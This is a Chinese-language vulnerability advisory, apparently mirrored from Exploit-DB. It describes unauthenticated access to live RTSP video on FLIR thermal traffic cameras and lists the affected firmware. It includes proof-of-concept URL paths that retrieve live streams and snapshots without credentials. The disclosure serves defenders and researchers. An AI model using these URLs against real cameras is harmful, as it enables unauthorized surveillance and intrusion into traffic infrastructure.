漏洞关键信息 漏洞标题 FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure EDB-ID 45537 CVE N/A 作者 LIQUIDWORM 类型 WEBAPPS 平台 HARDWARE 日期 2018-10-06 漏洞应用 未指定 受影响的固件版本 V1.01-0bb5b27 (TrafiOne) [Codename: TrafiOne] E1.00.09 (TI BPL2 EDGE) [Codename: TIIP4EDGE] V1.02.P01 (TI x-stream) [Codename: TIIP2] V1.05.P01 (ThermiCam) [Codename: ThermiCam] V1.04.P02 (ThermiCam) [Codename: ThermiCam] V1.04 (ThermiCam) [Codename: ThermiCam] V1.01.P02 (ThermiCam) [Codename: ThermiCam] 描述 FLIR 热成像交通摄像头存在未经身份验证和未经授权的实时 RTSP 视频流访问漏洞。 简单的 PoC http://Target/live.mjpeg?id=1 rtsp://Target/mpeg4 http://Target/snapshot.jpg 建议 ID ZSL-2018-5489 建议 URL https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php